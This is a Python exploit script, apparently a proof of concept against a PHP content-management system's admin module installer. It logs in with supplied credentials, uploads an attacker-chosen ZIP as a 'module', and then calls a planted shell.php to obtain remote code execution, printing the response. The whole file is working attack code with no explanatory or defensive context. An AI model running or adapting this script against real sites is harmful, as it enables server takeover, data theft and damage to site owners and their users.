import requests
from requests_toolbelt.multipart.encoder import MultipartEncoder

# Define variables
hostname = "replace_with_your_hostname"
username = "replace_with_your_username"  # login username
password = "replace_with_your_password"  # login password

login_url = f"http://{hostname}/login.php"
upload_url = f"http://{hostname}/admin.php?action=installmodule"
headers = {"Referer": login_url}
login_payload = {"cont1": password, username: "", "submit": "Log in"}

file_path = input("ZIP file path: ")

# Prepare multipart data
multipart_data = MultipartEncoder(
    fields={
        "sendfile": ("payload.zip", open(file_path, "rb"), "application/zip"),
        "submit": "Upload"
    }
)

# Create a session and perform login
session = requests.Session()
login_response = session.post(login_url, headers=headers, data=login_payload)

# Check if login is successful
if login_response.status_code == 200:
    print("Login successful")

    # Prepare upload headers
    upload_headers = {
        "Referer": upload_url,
        "Content-Type": multipart_data.content_type
    }
    upload_response = session.post(upload_url, headers=upload_headers, data=multipart_data)

    # Check if upload was successful
    if upload_response.status_code == 200:
        print("ZIP file uploaded successfully.")
    else:
        print("ZIP file upload error. Response code:", upload_response.status_code)
else:
    print("Login problem. Response code:", login_response.status_code)

# Perform RCE request
rce_url = f"http://{hostname}/data/modules/payload/shell.php"
rce_response = requests.get(rce_url)

# Print RCE response
print(rce_response.text)